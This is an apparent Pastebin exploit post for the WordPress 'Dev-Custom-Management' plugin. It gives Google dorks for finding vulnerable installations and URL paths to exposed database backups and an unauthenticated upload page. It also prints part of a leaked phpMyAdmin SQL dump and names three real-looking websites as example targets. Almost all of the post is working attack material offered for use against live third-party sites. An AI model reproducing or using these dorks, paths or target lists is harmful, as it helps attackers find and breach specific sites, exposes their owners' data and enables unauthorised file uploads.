KingSkrupellos

WordPress Dev-Custom-Management Plugins VerzDesign Vuln

Dec 16th, 2018
244
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.94 KB | None | 0 0
  1. #################################################################################################
  2.  
  3. # Exploit Title : WordPress Dev-Custom-Management Plugins VerzDesign 1.0 Database Backup Disclosure and Arbitrary File Upload
  4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
  5. # Date : 17/12/2018
  6. # Vendor Homepage : wordpress.org ~ verzdesign.com
  7. # Software Download Link : N/A
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Version Information : 1.0 and 3.0.1
  11. # Exploit Risk : Medium
  12. # Google Dorks : inurl:''/wp-content/plugins/dev-custom-management/''
  13. + intext:''© 2012 Optimai All Rights Reserved''
  14. + intext:''Web design by Verz''
  15. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
  16. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
  17. CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
  18.  
  19. #################################################################################################
  20.  
  21. # Admin Panel Login Path :
  22.  
  23. /wp-login.php
  24.  
  25. # Exploit :
  26.  
  27. /wp-content/plugins/dev-custom-management/New%20Text%20Document.txt
  28.  
  29. /wp-content/plugins/dev-custom-management/New%20Folder/New%20Text%20Document.txt
  30.  
  31. # Exploit :
  32.  
  33. /wp-content/plugins/dev-custom-management/filemanager/connectors/uploadtest.html
  34.  
  35. /wp-content/plugins/dev-custom-management/homeupload/....
  36.  
  37. /wp-content/plugins/dev-custom-management/subupload/....
  38.  
  39. /wp-content/plugins/dev-custom-management/certiupload/.....
  40.  
  41. /wp-content/plugins/dev-custom-management/upload/.....
  42.  
  43. /wp-content/uploads/[YEAR]/[MONTH/......
  44.  
  45. #################################################################################################
  46.  
  47. # Example SQL Dump Information =>
  48.  
  49. -- phpMyAdmin SQL Dump
  50. -- version 3.1.3.1
  51. -- phpmyadmin.net
  52. --
  53. -- Host: localhost
  54. -- Generation Time: Sep 13, 2011 at 04:06 AM
  55. -- Server version: 5.1.33
  56. -- PHP Version: 5.2.9
  57.  
  58. -- Database: `oneome`
  59.  
  60. -- Table structure for table `oo_ecom_advertisement`
  61.  
  62. -- Dumping data for table `oo_ecom_advertisement`
  63.  
  64. -- Table structure for table `oo_ecom_category`
  65.  
  66. -- Dumping data for table `oo_ecom_category`
  67.  
  68. -- Table structure for table `oo_ecom_category_feature`
  69.  
  70. -- Dumping data for table `oo_ecom_category_feature`
  71.  
  72. -- Table structure for table `oo_ecom_countries`
  73.  
  74. -- Dumping data for table `oo_ecom_countries`
  75.  
  76. -- Table structure for table `oo_ecom_feature_value`
  77.  
  78. -- Dumping data for table `oo_ecom_feature_value`
  79.  
  80. -- Table structure for table `oo_ecom_product`
  81.  
  82. -- Dumping data for table `oo_ecom_product`
  83.  
  84. -- Table structure for table `oo_ecom_product_gallery`
  85.  
  86. -- Dumping data for table `oo_ecom_product_gallery`
  87.  
  88. -- Table structure for table `oo_ecom_states`
  89.  
  90. -- Dumping data for table `oo_ecom_states`
  91.  
  92. -- Table structure for table `oo_ecom_user`
  93.  
  94. -- Dumping data for table `oo_ecom_user`
  95.  
  96. INSERT INTO `oo_ecom_advertisement` (`id`, `advertisement_image`, `advertisement_name`,
  97. `advertisement_price`, `advertisement_link`) VALUES
  98. (1, '1315680184fca8f44c28.jpg', 'ttest', 11111, 'https://mail.google.com/mail/?hl=en&tab=wm#inbox');
  99.  
  100. INSERT INTO `oo_ecom_category` (`id`, `category_name`, `short_description`, `cat_image`,
  101. `parent_id`, `show_in_navigation_menu`, `level`, `date_of_add`) VALUES
  102.  
  103. INSERT INTO `oo_ecom_category_feature` (`id`, `category_id`, `feature_name`) VALUES
  104. (1, 12, 'Feature 1'),
  105. (2, 12, 'Feature 2'),
  106. (3, 12, 'Feature 3');
  107.  
  108. INSERT INTO `oo_ecom_countries` (`countries_id`, `countries_name`, `countries_iso_code_2`,
  109. `countries_iso_code_3`, `flag`) VALUES
  110.  
  111. INSERT INTO `oo_ecom_feature_value` (`id`, `product_id`, `feature_id`, `feature_value`) VALUES
  112. (1, 1, 1, 'Feature Val 1'),
  113. (2, 1, 2, 'Feature Val 2'),
  114. (3, 1, 3, 'Feature Val 3');
  115.  
  116. INSERT INTO `oo_ecom_product` (`id`, `category_id`, `product_name`, `start_price`, `end_price`,
  117. `unit_name`, `currency`, `port`,
  118. `minimum_order_quantity`, `supply_ability`, `payment_terms`, `packaging_detail`, `delivery_detail`,
  119. `specifications`, `add_user_type`, `user_id`) VALUES
  120.  
  121. INSERT INTO `oo_ecom_product_gallery` (`id`, `product_id`, `product_image`, `is_main_image`) VALUES
  122. (1, 1, '13156295357df20a3a87.jpg', 'N');
  123.  
  124. INSERT INTO `oo_ecom_states` (`state_id`, `state_name`, `countries_id`) VALUES
  125. (1, 'West Bengal', 99),
  126. (2, 'Bihar', 99);
  127.  
  128. #################################################################################################
  129.  
  130. # Example Vulnerable Sites =>
  131.  
  132. [+] optimai.com/wp-content/plugins/dev-custom-management/New%20Text%20Document.txt
  133.  
  134. [+] asiagas.com.sg/wp-content/plugins/dev-custom-management/New%20Folder/New%20Text%20Document.txt
  135.  
  136. [+] beaulieuhouse.com.sg/wp-content/plugins/dev-custom-management/filemanager/connectors/uploadtest.html
  137.  
  138. #################################################################################################
  139.  
  140. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  141.  
  142. #################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment